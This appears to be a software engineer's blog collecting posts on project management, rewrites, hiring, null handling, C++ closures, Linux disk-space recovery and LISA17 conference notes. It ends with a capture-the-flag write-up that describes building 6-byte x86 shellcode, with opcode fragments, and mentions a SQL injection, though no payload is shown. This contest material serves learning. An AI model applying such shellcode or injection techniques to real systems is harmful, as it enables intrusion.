John Fremlin's blog

Toys for project management

Posted 2019-08-02 22:00:00 GMT

Project management is overhead but communication between people is essential. Just as team outings or testing are overhead but can accelerate the main activities of a group, project management done well is a massive productivity boost.

Unfortunately, while I've worked on projects with many good TPMs, there is always criticism of the project management. The complaints are always the same: everything should be in one place and somehow simple. These demands are contradictory. They are inevitably hurtful to anybody who put effort into project-managing a complex project.

The solutions proposed are always to start from scratch with a new methodology: JIRA, a spreadsheet, Trello, etc. This is destructive to morale in two ways: first, you're telling the people who put effort into the old systems that their work isn't recognised; second, you're demanding that they toil to move everything into the new shiny toy.

Even more destructive to morale is when the new toy system inevitably captures only part of the complex project, or gets unwieldy or out of date. And then the complaint that there are multiple systems and not just one place is made true.

People only loosely involved in the project must not be allowed to destabilise it with these criticisms and any success in project management needs to be celebrated loudly. It's a tough job and the hard work of bringing up mismatched expectations, cross checking and following up is what's useful - and much more important than choosing a shiny toy.


Curse of business logic

Posted 2019-05-18 22:00:00 GMT

People complain that a piece of software is bogged down in technical debt and needs to be rewritten as there is business logic scattered all over it. If the rewrite goes ahead, this is then inevitably followed — in a few years — by a new set of people making the same complaint about the rewrite.

What is wrong with business software? If we follow this reasoning, it becomes messy due to contamination by filthy business logic.

That premise is convenient. We can use it to avoid thinking about the business. Unfortunately, it rejects the source of funding for the software. The reason the software was written in the first place was hopefully related to supporting the business.

Logically, then, if there is anything in the business software that is not business logic, why is it there?


Lambdas as classes

Posted 2018-12-16 23:00:00 GMT

A class is just a closure with an arbitrary set of entry points.

A closure is a function defined inline. Commonly it's called a lambda. It may capture some values from the enclosing scope. These are stored in memory. They're laid out just as if a class or structure was defined that contained them.

In fact, many compilers will lay them out exactly the same way.

#include <iostream>
class Point {
public:
  int x;
  int y;
  Point(int x_, int y_) : x(x_), y(y_) {}
  int d(int ox, int oy) {
    return (ox-x)*(ox-x) + (oy-y)*(oy-y);
  }
};
void dump_mem(char const* name, int const* p) {
  std::cout << name << "\t@" << p << "\t " << p[0] << ',' << p[1] << std::endl;
}
int main() {
  int x = 1337; int y = 65537;
  Point p{x, y};
  auto d = [=](int ox, int oy) {
    return (ox-x)*(ox-x) + (oy-y)*(oy-y);
  };
  dump_mem("class", (int*)&p);
  dump_mem("lambda", (int*)&d);
}

On my computer this outputs

class   @0x7ffcd00fd748  1337,65537
lambda  @0x7ffcd00fd750  1337,65537

Lambdas are like classes and vice versa.

Some languages, like C++, let you create a class that can behave like a lambda by having a default entry point (operator()). Other languages do not.

In some languages, it's inconvenient to create classes but easy to pass around lambdas. Then you can pass around collections of lambdas that touch the same bound variables, just like a class.

Beyond this trivial equivalence, it's actually useful for structuring problems, particularly in coding interviews, where concision is very valuable and the problem is neat. It lets you close over multiple variables and not pass them to every function.

Here is an example of a solution to the small problem for this excellent Google Codejam Kickstart question. We obtain the concision of global variables, without the downside of singleton global state.

#include <iostream>
#include <vector>
#include <cstdlib>
#include <limits>
#include <cassert>
using namespace std;
struct MaxSweetness {
  // problem defined inputs
  long N, O, D;
  long X1, X2, A, B, C, M, L;
  vector<long> S;
  // solution state variables
  long best_so_far;
  bool found_any;
  long sweetness;
  long odds;
  auto& read(std::istream& is) {
    is >> N >> O >> D
       >> X1 >> X2 >> A >> B >> C >> M >> L;
    S.resize(N);
    return *this;
  }
  auto& build_sweetness() {
    unsigned j = 0;
    long X_1 = X2;
    long X_2 = X1;
    S[j++] = X1 + L;
    if (j < S.size())
      S[j++] = X2 + L;
    for (; j < S.size(); ++j) {
      long X_0 = (A * X_1 + B * X_2 + C) % M;
      X_2 = X_1;
      X_1 = X_0;
      S[j] = X_0 + L;
    }
    return *this;
  }
  void add_candy(long index) {
    auto val = S[index];
    odds += abs(val) % 2;
    sweetness += val;
  }
  // can Supervin eat more candy?
  bool unlimited() {
    return odds <= O && sweetness <= D;
  }
  void check_sweetness() {
    if (unlimited()) {
      best_so_far = max(best_so_far, sweetness);
      found_any = true;
    }
  }
  void del_candy(long index) {
    auto val = S[index];
    odds -= abs(val) % 2;
    sweetness -= val;
  }
  auto& best() {
    best_so_far = numeric_limits<long>::lowest();
    found_any = false;
    sweetness = 0;
    odds = 0;
    // sliding window [left, right) over the candies
    long left = 0;
    long right = 0;
    while (left < N) {
      while (unlimited() && right < N) {
        add_candy(right++);
        check_sweetness();
      }
      if (left < right) {
        del_candy(left);
        if (left + 1 < right)     // only score non-empty windows
          check_sweetness();
      }
      ++left;
    }
    return *this;
  }
};
int main() {
  int T;
  cin >> T;
  for (int c = 1; c <= T; ++c) {
    auto solved = MaxSweetness().read(cin).build_sweetness().best();
    cout << "Case #" << c << ": ";
    if (solved.found_any)
      cout << solved.best_so_far;
    else
      cout << "IMPOSSIBLE";
    cout << endl;
  }
}

Notice how this allows us to keep lines short and to move logic into helper functions easily.

In an interview where time is at a premium this means you can structure code to impress without having to remember to pass a long list of arguments.

Not only does this reduce verbose, error-prone parameter passing, it also greatly reduces the cost of modifying that code to add another parameter. Instead of threading the new parameter through a complex chain of nested calls, the value is accessible everywhere.

It's particularly handy for recursive calls where some state needs to be transmitted. The state can be made implicit in the this parameter. Of course, it doesn't work for everything. Having the code for a big project in one file becomes unwieldy and it's hard to understand what affects what. Use this tool appropriately!


The Rewrite Fallacy

Posted 2018-04-28 22:00:00 GMT

Software developers love to criticise working code, say it is all very bad, and should be rewritten. It's generally possible to discourage the junior engineers who try this tactic by pointing out how big a project it would be. But some very experienced ones are looking for a big project, know that the rewrite might have few customer facing improvements, is likely to fail and come in over-budget and late, and still propose it. They claim that this time, it will be different. Why?

The upfront costs of understanding an old, working system are high and visible progress is low. The immediate visible productivity of a rewrite is high. There is the opportunity to output grand sounding designs and lots of code. Therefore the engineer will likely benefit from an unnecessary rewrite and appear productive doing it.

Unfortunately, the cost of understanding the problem domain will be borne. This will take time. Typically, there is a built in expectation that a project will be later than estimated — so paying this cost towards the end makes sense for the engineer.

The development time before the rewrite starts to benchmark itself against the prior system will look falsely productive. To counter this, as soon as possible, the design and implementation of components of the new system should be validated against production. The new systems should immediately take over responsibility as they are built, or in some way have the workload be mirrored into them, to close this window of false productivity.

Will the rewrite be a net improvement? Unless the team is very familiar with the old system, there is little reason to believe this. In fact, as the old system is working and the new one is not, at least at the moment of deciding to fund the project, then objectively the new system must be worse to start with. Hopefully, it will improve to be better over time.

Hope is a huge benefit of a rewrite. Allowing a rewrite can greatly improve morale. The blessing of this optimism has to be balanced with the curse of optimistically ignoring problems.

Rewrites are controversial and often opposed by people with responsibility for outcomes because they are a way for weak engineers to make a land grab and claim they did a good job with no accountability. Given this context, engineers might be reasonably worried about revealing issues until so much cost has been sunk that issues will not be used to cancel the project. A typical tactic for this is to claim that nothing can be measured until the whole system is built and to refuse to make even small changes to the old system, which would greatly improve matters but make the rewrite less urgent.

In my experience, a small amount of imagination and a little work is enough to run in parallel with the old system. This work is likely to be resisted but it will reduce risk and most importantly will focus efforts and align people around tangible outcomes.

It's important to set the expectation that success will not be immediate, and balance the benefits of the hope with concrete measured progress. In the best case, the confidence and ownership gained from a rewrite can outweigh the costs — it's an investment in an engineering team's level of engagement.



How B players hire C players

Posted 2018-03-18 23:00:00 GMT

Jack Welch, the former GE CEO, popularized segmenting workers into letter groups: A players (the top 20%), B players (the middle 70%) and C players (the bottom 10%). Steve Jobs is popularly quoted: A players hire A players; B players hire C players; and C players hire D players. It doesn't take long to get to Z players. This trickle-down effect causes bozo explosions in companies.

I've been on interview loops for hundreds of candidates at companies that claim to want to hire the best. Out of those hundreds of interviews a few really outstanding candidates come up. We manage to get them rarely. If our aim is to hire the best, why do we often fail?

Often, an interviewer will have a negative reaction to the candidate, leaving feedback like aced the interview but don't want to work with them. This makes it difficult to justify a strong effort to hire. Once, I was on a loop with a superstar candidate. I and several others noted that. One of the other interviewers was a famous figure in an academic branch of engineering. The interviewee argued with the famous figure. It seemed to me that the candidate was probably right but the interviewer was so offended we couldn't extend an offer.

For nearly every firm, there are people who are much better and much worse for the job than those working there. The quote about A players hiring A players is justified with the idea that somehow people at the top won't mind hiring people better than them — as they might be more confident and willing to embrace challenging points of view. I don't think that's always true as the example above suggests.

A thought experiment that I've found useful is to imagine how a superstar candidate would experience the interview. I liked to bring this up when training interviewers. The questions would be super easy and interviewers themselves would make basic mistakes. How could such a candidate communicate in a way that did not appear arrogant?

Well I found out. I once interviewed such a senior candidate. I was asking a systems design question. The candidate would easily complete designs based on my suggestions but was cautious about suggesting anything himself. It was a little confusing as he was obviously very capable and knew how to design for all the different trade-offs I could think up. I felt I was missing something and gave him very positive feedback. The other feedback showed him acing the coding interviews. This superstar wasn't dinged for arrogance — he'd carefully avoided mentioning mistakes made by the interviewers. Unfortunately, he wasn't enthusiastic about joining our company — understandably. He would have been working with people much less capable.

This is a hard reality to reconcile with wanting to hire the best. People better than you might not want to work with you. Much more comfortable to hire those who do — but the benefits of a little humility can be extraordinary!


Nothing was a billion dollar mistake

Posted 2018-01-19 23:00:00 GMT

Tony Hoare, inventor of quicksort and many other foundational computer science concepts, called the null reference his billion-dollar mistake. He invented it in 1965: the special value of zero is used to indicate that a reference points nowhere. This is very efficient. But it's not a mistake. The mistake is to try to ban missing values. They often really are missing!

Java programmers particularly are afflicted by the NullPointerException, with millions of hits for this on Google. They abbreviate it to NPE, and bemoan it. They'll actually check whether they would throw it and then throw another exception instead — though Java code that distinguishes exception types is rare.

At a superficial level, the null pointer exception is the result of a mismatch of expectations: someone wrote some code that wanted a value, and someone called that code without giving it the value. Without looking deeper, an immediate obvious response is to systematically try to annotate or check that the values are really there when they are required.

The default behaviour in Objective-C or SQL, where null (or nil) just combines to form another null, usually makes more sense for the output of the program, especially for programs which should not crash. Still, missing values disrupt the normal computation, and thinking harder about what to do is often worth it.

There have been countless quixotic attempts to avoid this hard thinking: to ban null, to make complicated ways to declare that things are not nullable, and define away nullness. There is a pedantic tendency to try to harness punctuation elements like ? or define Option types — to try to force people to spend effort to admit that a value could be missing.

This misses the point about missing values: the hard problem isn't when someone is deliberately, maliciously trying to withhold information from the code they're calling. Instead, it's when they just don't have the information and are passing down what they have. The systematic response should generally not be to insist on and demand the information. That would be convenient and make it very easy for one party in the exchange, as now we can write the code without figuring out what to do when there is incomplete information.

Unfortunately, incomplete information is the default state of the world. If the programmer won't deal with it, then the poor users of the program will have to, by entering bogus values. It's better to unambiguously indicate that something is missing rather than demand a lie!

Thousands of immigrants to the US have an invented first name, which is very inconvenient for them, because systems are set up to discourage a missing name: they are called Fnu. This is a bureaucratic consequence of a non-null annotation. Fnu is an acronym for First Name Unknown and, in a bizarre twist of fate, it is given as the first name to people who only have a single name, so that the last name is not null.

In the real world, incomplete information is the default. A convenient unambiguous representation is the null pointer, which doesn't take up space in terms of its binary representation or syntax — unlike the verbose imposition of Option types as in Haskell.

Incomplete information is the default with computers too. We need to learn to accept that. Recent language standardizations try to pretend it's not the case, forcing painful complexity on users.

The C++ variant, a type-safe union proposed in the last few years, misses this lesson. In an opinionated attempt to ban null, there is no empty value for a variant by default. But a variant can still be empty, they call it valueless_by_exception(), and so code has to deal with it. This paradox afflicts Kotlin too, where non-nullable lateinit fields can be null before they're initialized. Requiring a null check on something marked non-nullable is just silly.

Let's accept that information is incomplete, and be kinder when that's the case!


Freeing space from open files on UN*X when deleting doesn't work

Posted 2017-12-29 23:00:00 GMT

Your disk is filling up, you run du | sort -n | less and identify the culprit, then rm -f. But df tells you that the disk space is still used.

According to POSIX, the removal of the file contents shall be postponed until all references to the file are closed: some program must still have the file open. Obviously, an easy way out is to kill all the programs using it, but sometimes you can't kill a program because it's doing something useful. First find which programs hold the file open with lsof -nP +L1.

That tells you the pid and fd numbers. The file could actually be opened in multiple ways! However, you only need to truncate it once - by running : | sudo tee /proc/$pid/fd/$fd for one of these pairs.

Note that if the file is mmap'd the process might get SIGBUS. If it's just a logfile, this is unlikely!

Some people choose to first truncate before deleting logfiles to avoid chasing through this, i.e. : > $file; rm $file.


LISA17 conference notes

Posted 2017-11-01 23:00:00 GMT

I attended the LISA17 conference in San Francisco. Here are some very rough and opinionated notes from talks that interested me. If I made any mistakes let me know and please comment on the things I missed!

Ted Ts'o: Linux performance tuning

This tutorial was exceptional because the speaker has years of experience as one of the top Linux developers. Ted uses emacs!

Goals of performance tuning

  • improve throughput
  • manage and understand performance cliffs

Investigate bottlenecks with rigorous scientific method: change one parameter at a time. Take lots of notes and make haste slowly. Measurement tools can impact behaviour of the observed application.

Basic tools to start with

  • Memory: free -m. Adding memory might be the easiest way to speed up the machine.
  • Tasks: top. What are the CPUs doing or waiting for?
  • IO: iostat -x -k 5. This shows average queue size (avgqu-sz) for requests and merging statistics - crucial for understanding performance given larger requests are much more efficient.

Example filesystem benchmark: fs_mark -s 10240 -n 1000 -d /mnt - creates 1000 files each 10kB in /mnt and does fsync after each. Can be greatly improved by relaxing sync guarantees. Use the exact benchmark for your application!

Cache flush commands are ridiculously expensive. Google runs in production with journal disabled, as it is so much faster and there is a higher level consistency guaranteed by multi-machine replication. This cross-machine cluster file-system also means RAID is unnecessary.

Ted Ts'o made this snap script for low impact performance monitoring extraction from production systems.


In terms of selecting hardware: note seek time is complicated and should typically be reported statistically - worst case and average. Low-numbered LBA offsets, at the outer diameter of the disk, can be much faster to seek. Therefore you can put your most used partitions at the first offsets of the disk - this is called short-stroking and can be a cheap way to get more performance. Filesystem software moves slowly as it has to be reliable; hardware generally moves much faster.

HDDs at 15000rpm run at hot temperatures and use a lot of power; many applications that used those have moved to SSDs. SSDs can also use a lot of power. They tend to fail on write. Random writes can be very slow - 0.5s average, 2s worst case for 4k random writes. You can wear out an SSD by writing a lot. See Disks for Data Centers in terms of advice about selecting hardware (Ted wrote this). Think about how to use iops across the fleet (hot and cold storage). The interface SATA 1.5Gbps or 3Gbps or PCIe may not be important given that e.g. random writes are slow. RAID does not make sense generally in today's world (at Google scale) and can suffer from read/modify/write cycles.

We can think about application specific file-systems, now we have containers. For example, ReiserFS is good for small files, XFS good for big RAID arrays and large files. Ext4 is not optimized for RAID.

Consider increasing journal size for small writes. Note Google disables the journal altogether.

Recommends Brendan Gregg's perf tools using ftrace. These were introduced at LISA 14

  • iosnoop - friendly blktrace
  • bitesize - distribution of IO sizes
  • opensnoop - file opens
  • iolatency
Also more advanced versions with lower overhead due to computing aggregates in kernel using eBPF, the BPF Compiler Collection (BCC): biosnoop, bitesize, biolatency, opensnoop.

Consider the multiqueue scheduler for very fast storage devices like NVMe.

Network tuning

Immediately check for trivial basic health: ethtool, ifconfig, ping, nttcp. Check for various off-load functions and that the advanced capabilities of the card are used.

Consider whether you want latency or throughput. Optimize the bandwidth delay product. Then remember that increasing window size takes memory; this can be tuned with net.core.rmem_max and net.core.wmem_max. Use nttcp to reduce buffer sizes as much as possible to avoid bufferbloat.

UDP might be a better bet.

However, we can push TCP to be low latency. Disable Nagle with setsockopt TCP_NODELAY. Enable TCP_QUICKACK to disable delayed acknowledgments.

NFS performance tuning

Recommends considering an NFS appliance, e.g. NetApp.

Some tricks: use no_subtree_check. Bump up nfs threads to 128. Try to separate network and disk IO to different PCI buses - no longer necessarily relevant with PCIe. Make sure to use NFSv3 and increase rsize/wsize. Mount options: rw,intr. Make sure to tune for throughput, large mtu and jumbo frames.

NFSv4: only use NFSv4.1 on Linux 4+, see ;login magazine, June 2015.

Memory tuning

If there is any swapping, first, try adding more memory. Add more and faster swap devices.

Paging will happen. majflts/s is rate of faults that result in IO. pgsteal/s is rate of recycling of page cache pages.

Try sar -W 3 and periodically send sysrq-m.

Note the memory hierarchy is important as closer caches are much faster.

Translation Lookaside Buffer (TLB) caches translation from virtual address to physical address. Can avoid up to six layers of lookup on 64-bit system - costing thousands of cycles. There are only 32 or 64 entries in the TLB in a modern system.

The jiffies rate can greatly affect TLB thrashing by controlling rate of task switches. Hugepages avoid consuming these entries. Kernel modules burn TLB entries while the originally loaded kernel does not.

The perf tool can show TLB and cache statistics.

Application tuning

Experimentation with eBPF.

For JVM consider GC and JIT. Size the heap.

Tools: strace, ltrace, valgrind, gprof, oprofile, perf (like truss, ktruss). Purify might not be as good as valgrind.

perf is the new hotness. Minimal overhead, should be safe in production from a performance perspective. However, the advanced introspection capabilities may be undesirable for security.

There are many interesting extensions - like the ext4slower program which shows all operations on ext4 that take longer than 10ms.

Userspace locking: make sure to use futex(2).

Consider CPU affinity.

Latency numbers that all programmers should know. Note this does not include random write for an SSD because that depends on a great many factors.


It's more addictive than pistachios!

It's time to shoot the engineer and put the darn thing into production.

Great way of learning about the whole stack!

Robert Ballance: Automating System Data Analysis Using R

This talk presented a valuable philosophy and attitude: that we should consider making repeatable re-usable reports. This goes against the grain of expectations around reporting which often frame reports as one-off tasks. The examples were very compelling.

Some background: R was written at Bell Labs by statisticians who were very familiar with UN*X. Data is dirty. The computations and software for data analysis should be trustworthy: they should do what they claim, and be seen to do so.

I've spent my entire career getting rid of spreadsheets.

Very rapid growth in CRAN R packages. Pipe operator %>%.

Used dplyr. Small repeatable pipelines for reports that can be reused. Very pretty code examples using dplyr and ggplot and the aforementioned pipe operators.

Renee Lung: Testing Before You Scale & Making Friends While You Do It

Your customers shouldn’t find problems before you do.

Onboarding a big new account with an expected 20k incidents per day, around 7M per year.

They wanted to test the load. The only thing that behaves like prod, is prod.

Chaos Engineering is about experiments in realistic conditions. PagerDuty has Failure Friday - where they expose systems to controlled experiments.

Balance business and engineering.

Decided to create a tool to simulate load.

Noticeable customer impact from first and second test but they still persisted which was quite brave. The talk was very honest about the interpersonal and organisational issues that the project faced.

Tried to explain why the staging environment is different from production to an idealistic questioner.

Baron Schwartz: Scalability Is Quantifiable: The Universal Scalability Law

Eben Freeman's talk on queuing is really good!

Recommends a talk by Rasmussen on failure boundaries.

Failure boundary is nonlinear.

Hard to apply queuing theory to the real world of capacity and ops, as difficult to figure out how much time is spent queuing in real systems.

Add a crosstalk (coherence) penalty with a coefficient k as a quadratic term to the denominator in Amdahl's law. The penalty represents the cost of communication.
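Concretely, this is Gunther's Universal Scalability Law: relative capacity C at concurrency N, with a contention coefficient σ (Amdahl's serial fraction) and a crosstalk coefficient κ, is

```latex
C(N) = \frac{N}{1 + \sigma (N - 1) + \kappa N (N - 1)}
```

With κ = 0 this reduces to Amdahl's law; with κ > 0 the quadratic coherence term eventually dominates, so capacity peaks and then retrogrades.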

Defines load as concurrency.

Suggests that load-tests should try to fit the crosstalk penalty and Amdahl's law parameters. Claims that this fits quite well to many real world scaling problems with some abstract examples.

Chastity Blackwell: The 7 Deadly Sins of Documentation

Without effort, documentation ends up scattered across multiple systems, and the costs are paid in ramping up new people. We should invest in documentation.

Blake Bisset; Jonah Horowitz: Persistent SRE Antipatterns: Pitfalls on the Road to Creating a Successful SRE Program Like Netflix and Google

SRE is not a rebranded ops, should not try to build an NOC.

Sasha Goldshtein: Fast and Safe Production Monitoring of JVM Applications with BPF Magic

Beyond performance, we can trace things like system calls to find out where something is happening - for example, the stacktrace of the code that is printing a message.

The JVM can cooperate by adding more tracepoints -XX:+ExtendedDTraceProbes.

The advantage of BPF as opposed to perf, is that BPF can filter and aggregate events in the kernel, which can make things much faster than perf, which just transmits events. BPF can calculate histograms and so on.

Needs recent kernels - 4.9 kernel for the perf_events attaching.

DB performance tracing

Many performance investigations can occur now without modifying any programs. For example, there are instrumentation scripts like dbslower that can print out which queries in MySQL and can be extended to other databases.

We can trace and find out the exact stacktrace where a query is printed.

GC performance tracing

Can trace GC: ustat tool and object creation with uobjnew.

Trace open file failures

Use opensnoop to find failed open syscalls. Then attach a trace for that specific error to a Java application.

Michael Jennings: Charliecloud: Unprivileged Containers for User-Defined Software Stacks in HPC

Want to make it possible for people to bring their own software stack to run on the supercomputers at Los Alamos, and decided to explore containers. Unlike virtual machines, they do not have performance impact on storage or networking (Infiniband).

Recommends this LWN article: Namespaces in operation.

Docker with OverlayFS can be slow on HPC. Therefore they built a system called Charliecloud with minimal performance impact, and native file-system performance.

Matt Cutts and Raquel Romano: Stories from the Trenches of Government Technology

Sometimes don't have source code or access to logs.

Many basic problems: 5% of veterans incorrectly denied healthcare benefits from a single simple bug.

Great value delivered by bug bounty programs.

API first!

Meaningful contribution - hugely impactful, bipartisan problems. Looking for software engineers and site reliability engineers for short tours of duty.

Jake Pittis: Resiliency Testing with Toxiproxy

CEO at Shopify once turned off a server as a manual chaos monkey.

Continued to work on resiliency, with gamedays. Then thought about automating the game days to ensure that issues remain fixed and don't regress.

Want to maintain authenticity.

ToxiProxy interposes latency, blackholing, and rejecting connections in the production systems and then is supported by automated testing in Ruby that asserts behaviour about the system.

Incident post-mortem fixes are checked and verified by injecting the faults again and checking application specific consequences. This confirms that fixes worked, and continue to work in the future.

Resiliency Matrix declares expected dependencies between runtime systems. ToxiProxy tests allow one to validate that the dependency matrix truly reflects the production reality.

Brendan Gregg: Linux Container Performance Analysis

Common system performance tools like perf do not work well in containers, as the pid and filesystem namespaces are different. System wide statistics (e.g. for free memory) are published to containers which causes programs to make wrong assumptions: for example, Java does not understand how much memory is actually available in the container.

The situation is improving and there is ongoing integration of support for monitoring performance of containerized applications.

Understanding which limit is hit in the case of CPU containerization can be very confusing as there are many different limits.

PS. Brendan's talk from last year at LISA16 gives a general introduction to the advanced bpf tools: LISA16: Linux 4.X Tracing Tools: Using BPF Superpowers

Teddy Reed and Mitchell Grenier: osquery—Windows, macOS, Linux Monitoring and Intrusion Detection

Labs showing how to collect and query many system level properties like running processes from a distributed set of systems with a tool called osquery.

It can collect current state and also buffer logs of changes.

Heather Osborn: Vax to K8s: Ticketmaster's Transformation to Cloud Native Devops

Tech Maturity model.

20k on-prem VMs.

Kevin Barron: Coherent Communications—What We Can Learn from Theoretical Physics

Human communications take a lot of time and we need to be careful that we're really communicating.

Evan Gilman and Doug Barth: Clarifying Zero Trust: The Model, the Philosophy, the Ethos

Establish some strong properties: that all flows are authenticated and encrypted.

No trust in the network. Policy automation based on a Ruby DSL and Chef that reconfigures iptables rules to add IPSec routes between application tiers.

Related to Google's BeyondCorp.

Beyond the control aspects, another value of the approach is observability. Mentioned that another way of doing this is Lyft Envoy.

Mostly build your own still.

Brian Pitts: Capacity and Stability Patterns

Very thoughtful talk with a comprehensive coverage of various techniques.

EventBrite has 150M ticket sales per year. Very spiky traffic, which can quadruple within a minute.

Bulkheads: partition systems to prevent cascading failures.

Canary testing: gradual rollout of new applications.

Graceful degradation.

Rate limiting. Understand capacity and control amount of work you accept.

Timeouts. Even calls to payment processors have to be timed out.

Capacity planning.
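Rate limiting in particular can be sketched with a classic token bucket. This is a generic illustration of the pattern, not EventBrite's implementation; the clock is passed in explicitly so behaviour under a spike is easy to test.

```python
class TokenBucket:
    """Token-bucket rate limiter: accept a bounded burst, then refuse
    work beyond a known sustained capacity."""
    def __init__(self, rate, burst, now):
        self.rate = rate        # tokens refilled per second
        self.capacity = burst   # maximum burst size
        self.tokens = burst
        self.last = now

    def allow(self, now):
        # Refill according to elapsed time, capped at the burst size.
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False

bucket = TokenBucket(rate=10, burst=5, now=0.0)
# A spike: 8 requests arrive at once; only the burst of 5 is accepted.
accepted = sum(bucket.allow(now=0.0) for _ in range(8))
assert accepted == 5
# A tenth of a second later, one token has been refilled.
assert bucket.allow(now=0.1)
```

Refused requests can then be shed cheaply (HTTP 429, a queue, a waiting room) instead of cascading into the failures the bulkhead and timeout patterns guard against.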

Corey Quinn: "Don't You Know Who I Am?!" The Danger of Celebrity in Tech

High energy and well presented talk.

Netflix: developers have root in production.

Should not be cargo-culted to places without the same culture of trust and top-quality talent.

Be careful about punching down. Recognise the weight that your words carry coming from a successful company with specific constraints.

Culture of security conferences is toxic.

Ben Hartshorne: Sample Your Traffic but Keep the Good Stuff!

Adapt the sample rate as you watch your traffic, so that observability infrastructure scales logarithmically with production. The sample rate should be recorded in each event, and the fraction kept reduced in proportion to traffic.

Honeycomb does this with honeytail. Another alternative is Uber's OpenTracing implementation, Jaeger, which uses a consistent sampler.
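A minimal sketch of the record-the-rate idea: each kept event carries its sample rate, so a weighted sum recovers the original volume even after most events are dropped. Field and function names here are mine, not Honeycomb's or Jaeger's.

```python
import random

def sample(events, sample_rate, rng):
    """Keep roughly 1/sample_rate of the events, recording the rate in
    each kept event so totals can be reconstructed later."""
    kept = []
    for event in events:
        if rng.random() < 1.0 / sample_rate:
            kept.append({**event, "sample_rate": sample_rate})
    return kept

def estimated_total(kept):
    # Each kept event stands in for sample_rate original events.
    return sum(event["sample_rate"] for event in kept)

rng = random.Random(1)
events = [{"status": 200}] * 10000
kept = sample(events, sample_rate=100, rng=rng)
# About 1% of events are stored, yet the weighted total still
# estimates the real traffic volume.
print(len(kept), estimated_total(kept))
```

"Keep the good stuff" then means choosing a much lower sample_rate for interesting events (errors, slow requests) than for routine ones, since the recorded rate keeps the arithmetic honest either way.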

Mohit Suley: Debugging @ Scale

Distributed tracing is the new debugger.

Use Twitter's anomaly detection R library.

Jon Kuroda: System Crash, Plane Crash: Lessons from Commercial Aviation and Other Engineering Fields

We need to be better at following checklists and the sterile cockpit rule (keeping unqualified people out). Avoid normalization of deviance. Lots to learn from the airline industry!

Think about telemetry.

Post a comment

Square CTF 2017 Grace Hopper

Posted 2017-10-18 22:00:00 GMT

Square put on a great competition this year at the Grace Hopper conference. My girlfriend was attending and had solved a lot of the challenges, but some of the high-pointers were left.


The 6yte challenge hooked me. The task was to exploit an x86 32-bit Linux binary to print a file to the console - in only 6 bytes of machine code. Most opcodes on x86 are at least two bytes, so this means using at most three instructions. A tight budget!

The 6yte program was pretty simple. It memory-mapped an executable region, decoded its command line argument as a hex string into this region, then jumped to it. It also printed out the addresses the program was loaded at.

On one side, this is much easier than exploiting a typical application nowadays, which probably marks writable memory non-executable. On the other hand, the 6yte program calls alarm() so that if you pause in the debugger, it will just crash, and it also uses sleep() to delay, so you can't immediately just try tons of things at random. These countermeasures made the contest much more fun for me.

I spent quite a while being misled by the printing of the program addresses into thinking I should use them. I wanted to call the puts function that is used elsewhere in the program to print out the string. In the process I learnt a lot about the Procedure Linkage Table. Trying to compute the relative address and then generate the right relative jump confused me. My plan was to spend one byte pushing edi onto the stack, and then five bytes jumping to puts(), or to push the address of puts() onto the stack and then jump to it, or something along those lines, but I just couldn't squeeze it into the remaining five bytes. Time to look more closely at the problem!

The disassembly for the jump to the decoded shellcode first loaded the address of the target string into eax and then put it in edi:

0x80488d2:   8d 85 68 ff ff ff               	lea eax, dword [ ebp +0xffffff68 ]
0x80488d8:   89 c7                           	mov edi, eax

Then we were given some handy register values. Comparing to Linux system call numbers, 4 is very helpful because it means write, and STDOUT_FILENO is 1. We are all set up to make a syscall!

0x80488da:   ba 05 00 00 00                  	mov edx, 0x5
0x80488df:   bb 01 00 00 00                  	mov ebx, 0x1
0x80488e4:   b8 04 00 00 00                  	mov eax, 0x4
0x80488e9:   ff 65 e8                        	jmp dword [ ebp + 0xffffffe8 ]

To execute the system call we need just two bytes, cd80, but first we need to move edi into ecx (with 89f9). This will unfortunately only print the first 5 bytes, as defined in edx, but we have two bytes of instructions left. I tried several ideas for increasing edx, like adding it to itself and shifting it and so on, but then remembered the wonderful lea instruction on x86. This oddly named instruction doesn't actually access memory: it combines a mov with a shift and add - a limited multiply-accumulate.

To find out opcodes, I was grepping the output of objdump --source over /lib32/, which has a good sample of opcodes - a shortcut to avoid having to run an assembler. I discovered that ecx <- edi + xx is 8d4f05xx. This costs four bytes, and then the last two can be used to do the int 0x80 syscall. Not the neatest solution (Cong Wang has a much better one) but it let me read out the flag :)

By now I was pretty enthused with the competition - it was my first time crafting an exploit!

Needle in the Haystack

The next problem I tried was the Needle in the Haystack forensics challenge. Many years ago I implemented a vfat filesystem and fsck program, so I was very happy to see that it had a FAT12 filesystem. Inside was a Ruby on Rails project. There were some developer passwords in it which I immediately put into the submission box for the challenge - and was punished with a RickRoll. That teasing riled me and though it was late on Thursday night after my floundering around on the previous problem, my motivation redoubled.

It took me a while to realise that there was nothing in the Ruby on Rails project. I compared it against the base skeleton created by the Rails setup by default. This was my first CTF, and I didn't know the conventions. I wasn't sure how much work was expected or what to focus on.

I tried a bunch of data recovery programs to dig out deleted files from the filesystem image, and found a tarball containing a git repository. I checked out all revisions in all branches, some of which were very temptingly labeled, but there didn't seem to be anything in it, so I tried a bunch more undeletion programs, and then switched to solve smaller challenges.

This gave me a better idea of the conventions used in the competition. Reading the rubric for the haystack challenge I noticed it mentioned the word blob: that meant the git repo was the right track, and git fsck --lost-found gave up the answer.
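The recovery step can be reproduced in miniature with standard git commands (this recreates the trick, not the contest image): write a blob that no ref points at, then let git fsck --lost-found dig it back out of the object store.

```python
import os
import subprocess
import tempfile

repo = tempfile.mkdtemp()

def git(*args, **kwargs):
    return subprocess.run(["git", *args], cwd=repo, check=True,
                          capture_output=True, text=True, **kwargs)

git("init", "--quiet")
# A dangling blob: stored in the object database, reachable from nothing.
git("hash-object", "-w", "--stdin", input="flag{dangling}\n")
# fsck copies dangling blobs into .git/lost-found/other/
git("fsck", "--lost-found")

lost = os.path.join(repo, ".git", "lost-found", "other")
recovered = [open(os.path.join(lost, name)).read()
             for name in os.listdir(lost)]
print(recovered)  # the dangling blob's contents come back
```

In the CTF the same idea applied to a repository pulled out of a deleted tarball: the flag lived in an object that no branch or tag referenced.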

This ended up being my favourite problem because it combined so many technologies (Ruby on Rails, FAT, git) and tantalized with apparent victory at multiple steps.


Other questions were also fun. I really enjoyed the SQL challenge - my first time doing a SQL injection, for which the SQLite function GROUP_CONCAT was very helpful. Then I found out that there was an easier version of 6yte without the bytes limit. Dammit!!
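The SQLite trick can be reproduced in a few lines: a query built by string splicing lets a UNION pull GROUP_CONCAT output from another table. The schema and payload below are invented for illustration, not the contest's.

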